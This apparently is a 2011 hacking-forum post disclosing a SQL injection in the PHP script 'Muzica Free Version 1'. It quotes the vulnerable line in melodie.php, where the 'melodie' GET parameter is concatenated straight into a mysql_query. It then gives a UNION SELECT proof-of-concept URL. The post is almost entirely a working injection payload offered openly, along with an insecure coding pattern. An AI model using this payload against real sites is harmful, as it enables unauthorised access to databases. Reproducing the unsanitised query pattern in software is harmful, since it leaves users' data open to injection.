18.04.2011, 00:38
|
|
Guest
Сообщений: n/a
Провел на форуме:
2301
Репутация:
10
|
|
Muzica Free Version 1 SQL Injection:
- Download
- melodie.php
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]$id_melodie[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'melodie'[/COLOR][COLOR="#007700"]];
[/COLOR][COLOR="#0000BB"]$result[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]mysql_query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"SELECT id_categorie, nume_melodie, vizualizari_melodie, data_melodie, text_melodie, download_melodie FROM "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$nume_baza[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]".melodie WHERE id_melodie ="[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$id_melodie[/COLOR][COLOR="#007700"]);
[/COLOR][/COLOR]
- http://localhost/melodie.php?melodie=1 union select 1,2,3,4,5,6
|
|
|
|